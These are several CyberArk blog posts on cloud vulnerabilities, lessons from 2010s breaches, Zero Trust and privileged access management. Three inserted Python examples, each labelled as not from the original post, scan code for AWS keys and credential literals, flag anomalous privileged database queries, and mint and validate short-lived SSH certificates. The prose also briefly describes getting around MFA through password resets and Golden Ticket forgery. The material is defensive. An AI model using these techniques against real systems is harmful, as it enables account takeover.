The NSA delves into four cloud architectural services common to most public clouds – identity and access management (IAM), compute, networking and storage. It describes how many organizations are turning to these cloud services, but cautions that cloud adoption introduces a host of new risks that must be understood and addressed. It places strong emphasis on the shared responsibility between organizations and cloud providers in protecting applications, data, and other sensitive information in the cloud.

The shared responsibility model illustrates that, while cloud providers are responsible for the cloud infrastructure, organizations are still accountable for the security of certain services and sensitive data stored in public clouds, such as configuration, applications, data and environments.

To shed some light on the most common risks, the NSA categorizes cloud vulnerabilities into four main groups – misconfiguration, poor access control, shared tenancy vulnerabilities, and supply chain vulnerabilities. These groupings take into account both how often these vulnerabilities occur and how sophisticated a cyber attacker has to be to take advantage of them.

Misconfiguration

One of the most prevalent vulnerabilities in cloud environments today, misconfigurations offer attackers the path of least resistance and so require very little sophistication from the attacker. These misconfigurations often arise from either policy mistakes or a misunderstanding of the security responsibilities on the organization’s side.

These misconfigurations can result in several issues, from denial of service to account compromise. If an attacker can abuse a misconfiguration to compromise a single privileged user, for example, they will use those credentials to compromise a cloud management console or, worse, ultimately take over control of the organization’s cloud environment.

Poor Access Control

These attacks almost always involve privileged access. The prevalence of this attack is widespread and it requires only moderate sophistication from the attacker. They look for opportunities to exploit weak authentication and authorization methods.

Once they gain a foothold, attackers will start to escalate privileges, move laterally through the environment, and, ultimately, compromise as many cloud resources as possible. For example, an attacker can bypass multi-factor authentication (MFA) by invoking a password reset where only single-factor authentication is required to reset credentials.

Shared Tenancy Vulnerabilities

Adversaries who are able to determine which software and hardware components are used in a public cloud hypervisor could take advantage of vulnerabilities to elevate privileges in the cloud. The NSA directive notes that while there have been no reported compromises in any major cloud computing platform, security researchers have demonstrated both hypervisor and container breakouts.

A recent example of this was CVE-2019-1372, where the attacker could remotely execute code, bypassing the sandbox, and CVE-2019-1234, where attackers could make requests to internal Azure Stack resources. Both examples have since been addressed.

Supply Chain Vulnerabilities

Supply chain vulnerabilities in the cloud include attackers inside the supply chain and backdoors intentionally installed in hardware and software. While infiltrating the supply chain is not usually an attacker’s ultimate goal, if the attacker can get the cloud provider to install hardware with a backdoor, it makes all other controls useless.

However, as we noted previously, cyber attackers will almost always seek the path of least resistance to carry out their mission. That usually involves abusing misconfigurations or privileged access instead of turning to highly sophisticated methods such as inserting an agent into the cloud supply chain.

At the end of the day, securing cloud instances is an ongoing challenge. The guidance offered by the NSA is helping to demystify some of this and – maybe even more importantly – provides prioritization of the most susceptible areas so organizations know where to focus their security resources.

At CyberArk, our goal is to help enterprises protect their assets and workloads wherever they exist – including in the cloud. We believe the NSA has taken an important step with this directive, which not only raises awareness about security in the cloud and the importance of protecting privileged access, but also supports productive conversations about shared responsibility.

With the CyberArk Privileged Access Security Solution, we help companies continuously discover privileged accounts as they are created and isolate privileged user sessions to protect cloud and on-premises critical systems, while speeding up the onboarding process and consumption of these credentials.

Want to learn more? Check out our eBook, “6 Key Use Cases for Securing Your Organization’s Cloud Workloads” and explore our cloud security resources.


Data Privacy Day: Data Protection Lessons from the 2010s https://www.cyberark.com/blog/data-privacy-day-data-protection-lessons-from-the-2010s/ Tue, 28 Jan 2020 14:00:55 +0000 https://www.cyberark.com/?p=84805

Today is “Data Privacy Day” – and while it seems like there is a day for nearly everything we hold dear (hello national grilled cheese day!), this particular date commemorates the 1981 signing of the first legally binding international treaty on data protection.

Data protection standards have come a long way since 1981, especially in the last couple of years with GDPR and CCPA – two regulations that extend the rights of individuals to better control and protect the use of their personal data in the evolving digital landscape. It’s generally believed that GDPR and CCPA are laying the foundation for further groundbreaking regulations.

And it makes sense.  According to Business Insider, “of the 15 largest data breaches in history, 10 took place in the past decade.”  These breaches collectively resulted in the loss of nearly 4 billion records.   So, as we embark on a new decade, let’s take a look at some of the data breaches of the 2010s that helped shape stricter consumer data protection.

2016

Uber Breach – Disclosed in November 2017, the breach itself took place in 2016 and exposed personal information belonging to 57 million drivers and riders. Attackers stole names, email addresses and phone numbers and demanded $100,000, which Uber paid. To add insult to injury, Uber later agreed to a $148 million settlement with U.S. state attorneys general for failing to disclose the breach promptly.

Lesson Learned?  Don't commit credentials to code. Uber's data was exposed because AWS access keys were embedded in code checked into a code repository; attackers who gained access to that repository harvested the keys and used them to read the data from Uber's cloud storage. Long-lived keys in a repository are worth exactly as much as the data they unlock, so scan commits for secrets, keep keys out of source, and rotate any key that has ever been committed.
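What a repository check for this mistake looks like, as an added example (this is not CyberArk's code and not part of the original post): a small scanner that runs over source text before it is committed and reports AWS access key IDs, AWS secret keys, private-key blocks and other high-entropy credential literals assigned to credential-looking names. The patterns, the entropy threshold and the sample file are assumptions constructed for the demo; the AWS values in the sample are the placeholder key pair from AWS's own documentation, not live credentials.

```python
"""Scan source text for embedded cloud credentials before it is committed."""
import math
import re

# AWS access key IDs: 20 characters, AKIA (long-term) or ASIA (temporary session) prefix.
AWS_ACCESS_KEY_ID = re.compile(r"\b(?:AKIA|ASIA)[0-9A-Z]{16}\b")
# Secret access keys are 40 base64-style characters; require a nearby 'secret...key'
# label so that arbitrary 40-character strings are not reported.
AWS_SECRET_KEY = re.compile(
    r"(?i)(?:aws)?_?secret(?:_access)?_?key\W{0,5}['\"]?([A-Za-z0-9/+=]{40})['\"]?"
)
PEM_PRIVATE_KEY = re.compile(r"-----BEGIN (?:RSA |EC |OPENSSH )?PRIVATE KEY-----")
# A quoted literal assigned to something named like a credential; only reported when
# the value looks machine-generated (high Shannon entropy, see below).
GENERIC_ASSIGNMENT = re.compile(
    r"(?i)(?:password|passwd|token|api_?key)\b\W{0,5}['\"]([^'\"\s]{16,})['\"]"
)
ENTROPY_THRESHOLD = 3.5   # bits per character; natural-language words sit around 2-3


def shannon_entropy(s: str) -> float:
    """Bits of entropy per character of s (0.0 for a single repeated character)."""
    total = len(s)
    return -sum((s.count(c) / total) * math.log2(s.count(c) / total) for c in set(s))


def scan(text: str) -> list:
    """Return (line_number, finding_type) pairs for every credential-looking literal."""
    findings = []
    for lineno, line in enumerate(text.splitlines(), start=1):
        if AWS_ACCESS_KEY_ID.search(line):
            findings.append((lineno, "aws-access-key-id"))
        if AWS_SECRET_KEY.search(line):
            findings.append((lineno, "aws-secret-access-key"))
        if PEM_PRIVATE_KEY.search(line):
            findings.append((lineno, "private-key-block"))
        m = GENERIC_ASSIGNMENT.search(line)
        if m and shannon_entropy(m.group(1)) >= ENTROPY_THRESHOLD:
            findings.append((lineno, "high-entropy-credential"))
    return findings


# Constructed sample file. The AWS values are the placeholder pair from AWS's own
# documentation, not live credentials; the API token is made up for the demo.
SAMPLE_SOURCE = """\
import boto3

# settings.py checked into the repo
AWS_ACCESS_KEY_ID = "AKIAIOSFODNN7EXAMPLE"
AWS_SECRET_ACCESS_KEY = "wJalrXUtnFEMI/K7MDENG/bPxRfiCYEXAMPLEKEY"
DB_PASSWORD = "changeme"
API_TOKEN = "q7Zt3mLk9XaP2vRc8WbN4yHd"
s3 = boto3.client("s3", aws_access_key_id=AWS_ACCESS_KEY_ID,
                  aws_secret_access_key=AWS_SECRET_ACCESS_KEY)
"""

if __name__ == "__main__":
    for lineno, kind in scan(SAMPLE_SOURCE):
        print(f"line {lineno}: {kind}")
```

The scanner reports lines 4, 5 and 7 of the sample and stays quiet on line 6: `"changeme"` is a weak password, but it is short and low-entropy, and catching weak human passwords is a different control from catching machine credentials in source. Wire a check like this into a pre-commit hook or the CI pipeline, and treat every hit as a key to rotate, not just a line to delete, because the repository history still holds it.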

2017

Equifax Breach – Several failures in tandem – an expired certificate on a device that inspected encrypted traffic, which left the data exfiltration unnoticed for months, and an automated scan that failed to identify the vulnerable version of Apache Struts (CVE-2017-5638) still running on a public web application – ultimately led to a breach that impacted 145 million customers in the US and 10 million UK citizens.

Lesson Learned?  Get security basics right. Despite cyber attacks becoming more targeted and damaging, organizations still frequently neglect the basics. Patches need to be applied promptly, vulnerability scans need to be checked against an accurate asset inventory, and certificates on monitoring devices need to be renewed before they expire. This breach also inspired elected officials to push for legislation tightening the protections required for consumer data, and it increased the pressure for executive accountability.

2018

Facebook’s Cambridge Analytica Breach – Cambridge Analytica, a British political consulting firm, harvested the personal data of millions of people’s Facebook profiles without their consent and used it for political advertising. The scandal erupted in March 2018 when a whistleblower brought it to light; the UK Information Commissioner’s Office (ICO) fined Facebook £500,000 (US$663,000), the maximum allowed under the data protection law in force at the time of the breach.

Lesson Learned?  Protect user data (or pay up). The ICO found that Facebook “contravened the law by failing to safeguard people’s information” – and Facebook suffered the consequences. The United States Congress has since placed additional pressure on Facebook to curb fake news, foreign interference in elections and hate speech, or risk additional, larger fines.

2019

Ecuador Breach – Data on approximately 17 million Ecuadorian citizens was exposed from an Elasticsearch server, operated by a private analytics firm, that was reachable from the internet without authentication. While the sheer scale of this breach made headlines, the breadth of the exposed information really made everyone stand up and take notice: official government ID numbers, phone numbers, family records, marriage dates, education histories and work records. A similarly exposed Elasticsearch server leaked the voter records of approximately 14.3 million people in Chile, around 80% of its population.

Lesson Learned?  Adhere to the shared responsibility model. Cloud providers secure the underlying infrastructure; everything the customer deploys on top of it – including whether a database listens on the internet without authentication – is the customer’s responsibility. As more and more government agencies look to the cloud to help them become more agile and better serve their citizens, it’s vital they continue to evolve their cloud security strategies to proactively protect against emerging threats – and reinforce trust among the citizens who rely on their services.

Desjardins Breach — The data breach that leaked info on 2.9 million members wasn’t the result of an outside cyber attacker, but a malicious insider – someone within the company’s IT department who decided to go rogue and steal protected personal information from his employer.

Lesson Learned?  Be proactive in identifying unusual or unauthorized behavior. While insider threats can be more difficult to identify, especially where the user has legitimate privileged access rights, it’s important to consistently monitor for unusual and unauthorized activity.  Even more critical is the ability to automatically remediate potentially risky behavior (think: putting a temporary hold on permissions) to reduce the time it takes to stop an attack and minimize data exposure. This breach showed that a defense-in-depth strategy that includes privileged access management, multi-factor authentication and database activity monitoring has never been more crucial.
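An added example of the per-identity baselining such monitoring relies on (not CyberArk’s code and not part of the original post): each privileged database user is compared against their own history of tables touched, row volumes and active hours, and an event that trips two or more of those checks is marked for an automatic privilege hold rather than just an alert. The audit-line format, the thresholds and the hold/alert policy are assumptions for the demo, and the log lines are constructed.

```python
"""Flag privileged database activity that departs from each identity's own baseline."""
import re
import statistics
from collections import defaultdict

# Constructed audit-line format; a real DAM or PAM session log carries more fields.
LINE = re.compile(r"^(?P<ts>\S+) user=(?P<user>\S+) action=(?P<action>\S+) "
                  r"table=(?P<table>\S+) rows=(?P<rows>\d+)$")


def parse(lines):
    """Parse audit lines into dicts; malformed lines are skipped rather than trusted."""
    events = []
    for line in lines:
        m = LINE.match(line.strip())
        if m:
            e = m.groupdict()
            e["rows"] = int(e["rows"])
            e["hour"] = int(e["ts"][11:13])   # ISO 8601 timestamp, UTC
            events.append(e)
    return events


def build_baseline(events):
    """Per user: tables normally touched, hours normally active, typical rows per query."""
    tables, hours, rows = defaultdict(set), defaultdict(set), defaultdict(list)
    for e in events:
        tables[e["user"]].add(e["table"])
        hours[e["user"]].add(e["hour"])
        rows[e["user"]].append(e["rows"])
    return {u: {"tables": tables[u], "hours": hours[u],
                "mean": statistics.mean(r), "stdev": statistics.pstdev(r)}
            for u, r in rows.items()}


def detect(events, baseline, sigma=3.0):
    """Score each event against its user's baseline; two independent signals trigger a hold."""
    alerts = []
    for e in events:
        reasons = []
        b = baseline.get(e["user"])
        if b is None:
            reasons.append("no baseline for this identity")
        else:
            if e["table"] not in b["tables"]:
                reasons.append(f"first access to table {e['table']}")
            if e["rows"] > b["mean"] + sigma * max(b["stdev"], 1.0):
                reasons.append(f"rows={e['rows']} far above baseline mean {b['mean']:.0f}")
            if not any(abs(e["hour"] - h) <= 1 for h in b["hours"]):
                reasons.append(f"never seen active around {e['hour']:02d}:00 UTC")
        if reasons:
            # Assumed response policy: one signal pages an analyst; two or more suspend the
            # session and place a temporary hold on the account's privileges for review.
            action = "hold-privileges" if len(reasons) >= 2 else "alert"
            alerts.append({"ts": e["ts"], "user": e["user"], "action": action, "reasons": reasons})
    return alerts


# Constructed sample data: a week of 'normal' history, then the suspicious window.
HISTORY = [
    "2019-04-29T10:02:11Z user=ops-dba action=SELECT table=members rows=100",
    "2019-04-30T11:15:40Z user=ops-dba action=SELECT table=claims rows=120",
    "2019-05-02T09:48:03Z user=ops-dba action=SELECT table=members rows=90",
    "2019-05-03T14:21:57Z user=ops-dba action=UPDATE table=members rows=110",
    "2019-05-06T16:05:22Z user=ops-dba action=SELECT table=claims rows=130",
    "2019-04-29T03:00:00Z user=svc-backup action=SELECT table=members rows=2850000",
    "2019-04-30T03:00:00Z user=svc-backup action=SELECT table=members rows=2900000",
    "2019-05-01T03:00:00Z user=svc-backup action=SELECT table=members rows=2870000",
]
RECENT = [
    "2019-05-10T10:15:00Z user=ops-dba action=SELECT table=members rows=105",
    "2019-05-11T02:40:12Z user=ops-dba action=SELECT table=members rows=2900000",
    "2019-05-11T02:41:30Z user=ops-dba action=SELECT table=member_credit_scores rows=2900000",
    "2019-05-11T03:00:00Z user=svc-backup action=SELECT table=members rows=2900000",
    "2019-05-11T02:45:00Z user=jsmith action=SELECT table=members rows=50",
    "not an audit line",
]

if __name__ == "__main__":
    for a in detect(parse(RECENT), build_baseline(parse(HISTORY))):
        print(a["ts"], a["user"], a["action"], "; ".join(a["reasons"]))
```

The point of baselining per identity rather than per threshold is visible in the sample: the backup service pulling 2.9 million rows at 03:00 is normal for that account and raises nothing, while the same volume from the DBA at 02:40, far outside that person’s hours, trips two checks and earns a hold. An identity with no history at all only gets an alert, because a single weak signal is not grounds for locking someone out.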

These incidents are just a small sample of the numerous data breaches that occurred in the 2010s.  Any organization that collects or stores customer information can learn from these incidents and the many more like them.  Not prioritizing data protection or simply doing the bare minimum can lead to regulatory non-compliance fines, or worse – the destruction of customer confidence and brand damage. Listening to the lessons of the past can help us prepare for a more secure future.

]]>
Why the Federal Government Should Trust in Zero Trust https://www.cyberark.com/blog/zero-trust-for-the-federal-government/ Tue, 21 Jan 2020 18:00:45 +0000 https://www.cyberark.com/?p=84156

Digital transformation isn’t just for businesses – organizations everywhere including the federal government are getting on board. Take, for instance, the Pentagon’s $10 billion JEDI Contract, which gives Microsoft the right to provide enterprise level platform as a service (PaaS) and Infrastructure as a Service (IaaS) to the Department of Defense – a key element of the Pentagon’s ongoing work to modernize its infrastructure. While this is just one of many examples of digital transformation efforts happening in the federal sector, the mission is the same – to interconnect and scale operations.

However, while modernization initiatives are great for efficiency and can offer citizens new services, these efforts can also increase the attack surface – potentially opening up new points of vulnerability.

Why the Need for a Zero Trust Framework?

What does Zero Trust have to do with privileged access? If we look back at some of the most successful cyber attacks on government agencies, a majority involved compromised privileged credentials. One of the most widely reported impacted the U.S. Office of Personnel Management (OPM), where an estimated 21.5 million records containing personal information were stolen by attackers who got into the network with malware and escalated privileges to infiltrate several OPM systems. It was the escalation of privileges that made this attack so impactful, and a well-documented lack of “security basics” that jeopardized OPM’s ability to contain the damage. The House Committee on Oversight and Government Reform reacted to the OPM breach by recommending that “OMB [the Office of Management and Budget] should provide guidance to agencies to promote a Zero Trust IT model.”

Zero Trust is centered on the belief that organizations should “never trust, always verify.” With Zero Trust, the way to limit the damage of a data breach is continuous validation of each request for access, monitoring the users’ activity, segmenting critical tasks across privileged users and enforcing session termination when a privileged user attempts uncommon and risky tasks.

If we think about the two access pathways into an organization, there are standard users, who generally have low-level access to the systems they need to do their jobs – usually limited to the application layer. Then there are privileged users, who often have unfettered access to the application layer, sensitive data and the mission-critical Tier 0 assets. And when you add modernized infrastructure into the picture, Zero Trust extends from requiring the trust and verification of human users to non-human users as well. This includes applications interacting with operating systems via service accounts and business (and robotic) automation processes where software bots are connecting to, storing and accessing sensitive data and applications.

The OPM breach and the many others like it are strong indicators that security has to evolve beyond helping to ensure that only trusted users can access the network to, in the case of a data breach, making it so attackers can’t cause significant damage to the organization.

How to Align to Zero Trust

Across the United States workforce, each employee has multiple business accounts – often 30 or more. Multiply that by the number of employees in a federal agency and the scale of the risk becomes clear. Add the digital transformation efforts under way in the federal sector and the growing number of non-human identities that require privileged access, and the risk grows exponentially.

Privileged Access Management (PAM) solutions not only help mitigate credential theft by isolating and vaulting passwords from users and systems, but they also align with Zero Trust strategies by integrating with multi-factor authentication solutions for continuous validation. Effective PAM solutions should provide continuous session monitoring and recording and enable the detection of the risky behavior through the use of analytics and session termination when unauthorized tasks occur.

CyberArk holds NIAP certification for its products and regularly works with federal agencies to help them better secure their critical infrastructure, reduce risk and protect against attackers and malicious insiders. To align with Zero Trust frameworks, we recommend:

  • Implementing a risk-based approach to security
  • Implementing continuous multi-step authentication and security to Tier 0 assets
  • Securing core privileges on endpoints and endpoint devices
  • Securing and monitoring the privileged pathway
  • Implementing attribute-based granular access controls

Want to learn more? Take the self-guided Privileged Access Security: 101 tour or get a detailed privileged access risk assessment with the CyberArk Discovery & Audit assessment.

]]>
CyberArk Launches New Just-in-Time Capabilities and More in v11.2 https://www.cyberark.com/blog/cyberark-launches-new-just-in-time-capabilities-and-more-in-v11-2/ Thu, 16 Jan 2020 13:15:08 +0000 https://www.cyberark.com/?p=83794

Operational efficiency and strong security. Finding the balance between the two is something security teams wrestle with every day. This was our vision for version 11.2 of the CyberArk Privileged Access Security Solution – to provide new privileged access management (PAM) features that make it easier for organizations to manage risk while enabling the business as digital transformation continues to evolve. In this version, customers benefit from new ways to achieve least privilege to manage risk and improve productivity.

New Just-in-Time Access and SSH Certificate Authentication for SSH Session Management

Leading companies like Netflix, Facebook and Uber use SSH certificate authentication for SSH session management, citing scalability, ease of use and strong security. The approach provides a centralized point of trust: a certification authority (CA) signs user certificates, and servers (hosts) only need to trust the CA’s public key rather than each user’s individual key.

An SSH certificate bundles the user’s public key with identity information (a key ID and the principals, i.e. the account names it may log in as), a validity period and operational restrictions (critical options and extensions), all signed by the CA. With certificate authentication, instead of managing the authorized keys on every host or controlling access to individual private keys, the host just needs to be configured to trust the SSH certification authority.

Unmanaged SSH keys lead to a large volume of privileged accounts and standing access on the target, increasing the attack surface. SSH certificate authentication at scale aligns with the principle of least privilege and balances ease of use and security.

To help customers unlock these benefits, CyberArk now allows for SSH certificate-based authentication by providing secure privileged session isolation, which grants Linux and Unix admins instant, just-in-time access, without security teams needing to manage a private-public key pair for each account and remote machine.

End users connect via SSH to a remote machine through CyberArk and, after they authenticate, CyberArk signs a short-lived SSH certificate and uses it to authenticate to the remote machine in an isolated and controlled session.

Here’s how it works:

  1. A user opens a native SSH session (e.g. PuTTY) to the CyberArk Privileged Session Manager server.
  2. CyberArk then signs an SSH key with a certification authority key from the CyberArk Vault, producing an SSH certificate in the process.
  3. The SSH session to the target system or Linux VM, whether on-premises or in the cloud, is then brokered with the necessary privileged account.

SSH certificates never travel to the end user’s workstation, and all carry a short, hard-coded time to live (TTL) of five minutes. Once a certificate has been used to connect it is immediately deleted, so that if one is somehow exposed to attackers it is unusable after that short window.
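What the signing step above produces, as an added example (not CyberArk’s code and not the implementation behind Privileged Session Manager): a broker-side routine that mints an Ed25519 user certificate in the OpenSSH certificate format with a five-minute validity window, and a target-side validator that performs the checks sshd performs against a trusted CA key. The key ID, the principal names and the 30-second clock-skew allowance are assumptions; the code relies on the `cryptography` package, and the CA and user keys are generated on the spot for the demo.

```python
"""Mint and validate a short-lived OpenSSH user certificate (ssh-ed25519-cert-v01)."""
import base64
import os
import struct
import time

from cryptography.exceptions import InvalidSignature
from cryptography.hazmat.primitives import serialization
from cryptography.hazmat.primitives.asymmetric import ed25519

CERT_TYPE = b"ssh-ed25519-cert-v01@openssh.com"
USER_CERT = 1            # type 2 would be a host certificate
TTL_SECONDS = 5 * 60     # the five-minute lifetime described above
SKEW_SECONDS = 30        # assumed tolerance for clock drift between broker and target host


def new_key() -> ed25519.Ed25519PrivateKey:
    return ed25519.Ed25519PrivateKey.generate()


def raw_public(pub: ed25519.Ed25519PublicKey) -> bytes:   # the 32 raw key bytes
    return pub.public_bytes(serialization.Encoding.Raw, serialization.PublicFormat.Raw)


def ssh_string(b: bytes) -> bytes:   # SSH wire 'string': uint32 length + bytes
    return struct.pack(">I", len(b)) + b


def read_string(buf: bytes, off: int):
    (n,) = struct.unpack_from(">I", buf, off)
    return buf[off + 4:off + 4 + n], off + 4 + n


def sign_user_cert(ca_key, user_pub, key_id, principals, serial, now=None) -> bytes:
    """Build the certificate body, sign it with the CA key, append the signature."""
    now = int(time.time()) if now is None else now
    body = (
        ssh_string(CERT_TYPE)
        + ssh_string(os.urandom(32))                                 # nonce
        + ssh_string(raw_public(user_pub))                           # user's public key
        + struct.pack(">QI", serial, USER_CERT)
        + ssh_string(key_id.encode())                                # logged by sshd on login
        + ssh_string(b"".join(ssh_string(p.encode()) for p in principals))  # allowed login names
        + struct.pack(">QQ", now - SKEW_SECONDS, now + TTL_SECONDS)  # valid after / valid before
        + ssh_string(b"")                                            # critical options: none
        + ssh_string(ssh_string(b"permit-pty") + ssh_string(b""))   # extensions: a tty only
        + ssh_string(b"")                                            # reserved
        + ssh_string(ssh_string(b"ssh-ed25519") + ssh_string(raw_public(ca_key.public_key())))
    )
    signature = ca_key.sign(body)
    return body + ssh_string(ssh_string(b"ssh-ed25519") + ssh_string(signature))


def to_authorized_line(blob: bytes) -> str:   # the one-line form of a <key>-cert.pub file
    return CERT_TYPE.decode() + " " + base64.b64encode(blob).decode()


def parse_cert(blob: bytes) -> dict:
    """Decode the fields a validator needs, keeping the exact bytes the CA signed."""
    cert_type, off = read_string(blob, 0)
    _nonce, off = read_string(blob, off)
    user_pub, off = read_string(blob, off)
    serial, kind = struct.unpack_from(">QI", blob, off)
    key_id, off = read_string(blob, off + 12)
    principals_blob, off = read_string(blob, off)
    valid_after, valid_before = struct.unpack_from(">QQ", blob, off)
    _critical, off = read_string(blob, off + 16)
    _extensions, off = read_string(blob, off)
    _reserved, off = read_string(blob, off)
    sig_key, signed_len = read_string(blob, off)     # signature covers everything before it
    sig_blob, _ = read_string(blob, signed_len)
    principals, p = [], 0
    while p < len(principals_blob):
        name, p = read_string(principals_blob, p)
        principals.append(name.decode())
    _alg, p = read_string(sig_key, 0)
    ca_raw, _ = read_string(sig_key, p)
    _alg, p = read_string(sig_blob, 0)
    signature, _ = read_string(sig_blob, p)
    return {"cert_type": cert_type, "kind": kind, "serial": serial, "user_pub": user_pub,
            "key_id": key_id.decode(), "principals": principals, "valid_after": valid_after,
            "valid_before": valid_before, "ca_raw": ca_raw, "signature": signature,
            "signed": blob[:signed_len]}


def validate(blob: bytes, trusted_ca_raw: bytes, login_as: str, now=None) -> str:
    """The checks sshd applies against a TrustedUserCAKeys entry: 'ok' or the refusal reason."""
    now = int(time.time()) if now is None else now
    c = parse_cert(blob)
    if c["cert_type"] != CERT_TYPE or c["kind"] != USER_CERT:
        return "not a user certificate"
    if c["ca_raw"] != trusted_ca_raw:
        return "signed by an untrusted CA"
    try:
        ed25519.Ed25519PublicKey.from_public_bytes(c["ca_raw"]).verify(c["signature"], c["signed"])
    except InvalidSignature:
        return "bad CA signature"
    if not c["valid_after"] <= now < c["valid_before"]:
        return "certificate expired or not yet valid"
    if login_as not in c["principals"]:
        return f"principal {login_as!r} not in certificate"
    return "ok"


if __name__ == "__main__":
    ca, user = new_key(), new_key()
    cert = sign_user_cert(ca, user.public_key(), "alice@pam-broker", ["alice"], serial=1)
    print(to_authorized_line(cert)[:72] + "...")
    print(validate(cert, raw_public(ca.public_key()), "alice"))
    print(validate(cert, raw_public(ca.public_key()), "alice", now=int(time.time()) + 600))
```

Run stand-alone, the block prints the certificate in its authorized-line form, then `ok`, then the refusal the same certificate gets ten minutes later. Two details carry the security argument: the TTL lives inside the signed `valid before` field, so a stolen certificate cannot be extended without the CA key, and the principals list limits which account names the certificate can log in as, which is what keeps the short-lived credential scoped to the one brokered session.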

This new capability expands CyberArk’s just-in-time offerings across cloud and hybrid environments and on the endpoint.

Create Native, Secure Access with Privileged Session Manager for Web

Along with Privileged Session Manager for SSH, we’ve also added a new tool to make native session management for web applications even easier. The Universal Connector Generator allows CyberArk customers to develop custom connectors that extend native, secure access capabilities to a wide range of SaaS or homegrown web applications.

In the era of digital transformation, web apps are ubiquitous for employees, but, whether they’re AWS Cloud Consoles, corporate social media accounts, or proprietary payroll portals, privileged access to apps that store sensitive data introduces new security risks.

With the Universal Connector Generator, CyberArk users can develop custom connectors that allow employees to launch fully isolated privileged sessions in web apps without credentials or session identifiers ever crossing their workstations – significantly reducing the risk of credential theft and session hijacking, two of the most common attack vectors in web and cloud app breaches.

The best part? Creating a plug-in is super easy and can be done in less than 15 minutes.

Here’s how.

The Universal Connector Generator automatically records the end user’s application login process, then creates a connector to isolate further sessions in this application. After testing confirms the connector provides native, isolated application access, the Universal Connector Generator automatically hardens the connector to ensure it meets security requirements. Teams can then export the connector for use by other Privileged Session Manager for Web users.

Custom Privileged Session Manager for Web connectors afford security teams the ability to provide secure, native access to their employees’ favorite applications.

This latest version of the CyberArk Privileged Access Security solution marks CyberArk’s ongoing commitment to helping our 5,000+ customers defend against targeted attacks with privileged access management while delivering a simple, efficient experience for their employees.

Expanded just-in-time capabilities and the addition of the Universal Connector Generator are just two key features of v11.2. The release includes many other PAM features, including improved Kubernetes support for Application Access Manager and new DevOps functionality in Privileged Session Manager for Web via out-of-the-box support for Jenkins and Ansible Tower.

Want to learn more? Contact us for a demo and join us on February 11th for a webinar and live demo showcasing native deployment options within CyberArk’s session management portfolio. Register here.

]]>
Busting Top Myths About Privileged Access Management https://www.cyberark.com/blog/busting-top-myths-about-privilege-access-management/ Tue, 14 Jan 2020 14:07:34 +0000 https://www.cyberark.com/?p=82944

Today, businesses everywhere are investing in infrastructure to support growth – whether that’s moving to the cloud or automating tasks and processes.  However, the newly introduced devices, application stacks and accounts that come with this modernization all present additional opportunities for attacker exploitation. For any organization – big or small – identifying and addressing security risks across this expanding attack surface can be a formidable challenge.

Privileged access management (PAM) programs that secure pathways to critical business information are foundational to an effective corporate cybersecurity program. Why?  Attackers view privileged accounts as one of the best ways to gain a foothold within an organization’s infrastructure. In fact, the vast majority of cyber attacks involve compromised privileged credentials and PAM solutions provide a critical layer of defense.

But, while securing privileged access consistently tops the lists of projects that can reduce risk and improve operational efficiency, some misconceptions surrounding PAM persist. Today, we’re going to bust five of the most prevalent PAM myths.

Myth #1: Because privileged access exists everywhere, it is impossible to secure.

While the scope of privileged access can be intimidating based on the complexity of your environment, dedicated PAM solutions and related policies can actually shrink the attack surface by shutting down pathways to critical resources.

Leading PAM solutions can automatically map privileged credentials across cloud and hybrid environments, saving security teams significant time and effort. And for those unsure of where privileged accounts exist, there are free tools like CyberArk Discovery & Audit to help organizations gain visibility into their privileged account landscape.

Additionally, modern PAM tools also incorporate automatic rotation of SSH keys and other privileged credentials at regular intervals to eliminate the time-consuming and error-prone manual tasks required for regulatory compliance. Meanwhile, automatic session monitoring capabilities systematically record all privileged account sessions and identify which users are operating privileged accounts.

Finally, the best PAM tools also provide detailed session monitoring recordings that can be sorted into searchable metadata for compliance and incident response teams and leverage user behavior analytics to automatically detect and suspend risky privileged sessions.

The impossible just became achievable.  Between account mapping, automatic credential rotation and detailed session monitoring, privileged access can be uncovered, managed and secured.

Myth #2: Privileged access management tools are challenging for administrators to manage.

That may have been true in the past, but today’s PAM solutions greatly ease and simplify administrator workloads. Collecting all privileged accounts in a centralized vault eliminates the need to manually search for and manage privileged credentials. In increasingly dynamic network environments, centrally locating the necessary tools to appropriately manage users’ privileged access can improve the efficiency and efficacy of IT projects. Automation tools also enable administrators to eliminate time-intensive tasks in favor of more strategic initiatives.

Especially as organizations move to the cloud, PAM tools can be particularly useful to address emerging risks of cloud migration. When adopting a hybrid or public cloud infrastructure, even slight misconfigurations can create new vulnerabilities.  Having holistic tools in place to discover risks associated with privileged access can improve an organization’s security posture.

Myth #3: Identity and Access Management (IAM) solutions are sufficient to protect privileged access.

It’s true that IAM tools and Multi-Factor Authentication (MFA) methods are strategic investments – but they do not replace the value of a PAM solution.  PAM solutions can independently protect privileged accounts with human and non-human identities like application accounts used in robotic process automation (RPA) or DevOps – something IAM solutions simply aren’t designed to do.

Focused on risk reduction, PAM tools can also protect privileged business users from sophisticated social engineering attacks capable of bypassing MFA. Most importantly, IAM tools require a direct connection to user directories like Active Directory (AD), and these connections are often hosted on-premises. If a domain controller – or any server from which the krbtgt account’s password hash can be extracted – is compromised, attackers can forge Kerberos tickets (a Golden Ticket attack) and persist undetected in the network. PAM can provide a vital security layer for the servers hosting IAM’s direct connection to directories like AD.

To create a strong enterprise security fabric, IAM systems and PAM solutions should be deployed as collaborative tools.

Myth #4: Privileged Access Management solutions interfere with operational efficiency.

The truth is that the daily tasks of most workers don’t require elevated privileges – and therefore PAM solutions won’t impact them at all.  For those who do require elevated privileges, leading PAM tools offer a variety of user-friendly formats, including RDP, SSH and web-native access, to provide credential vaulting and session management in the background of their daily workflows. Native and transparent access provides organizations with comprehensive privileged session recordings while minimizing disruption for end users.

In fact, using PAM tools to automate time-consuming tasks for IT and security employees can improve productivity by freeing up time for higher-value projects. Audit teams can achieve the same benefits by automating compliance tasks — especially in highly regulated industries like healthcare and banking.  Manually sorting through all sessions that involve privileged credentials to find high-risk activity can be extremely time consuming. PAM solutions can automate these tasks and identify risky behavior for audit teams, freeing them up to spend their time on other critical tasks.

Modern PAM solutions can actually be a boon to operational efficiency – not an impairment.

Myth #5: It’s Difficult to Calculate ROI for Privileged Access Management solutions.

The average cost of a data breach in 2019 came in at nearly $4 million. Notably, this figure does not include the additional costs of lost business from reputation damage and theft of intellectual property. Privileged access is a focal point for organizations to demonstrate where security solutions can have a high impact.

In any security program, cost-efficiency is key. Organizations must take a risk-based approach, applying finite resources where they can achieve quick wins and long-lasting impact. And it’s in this area where PAM solutions can really shine. PAM is a high-leverage point where modest investments can achieve outsized ROI and risk reduction.

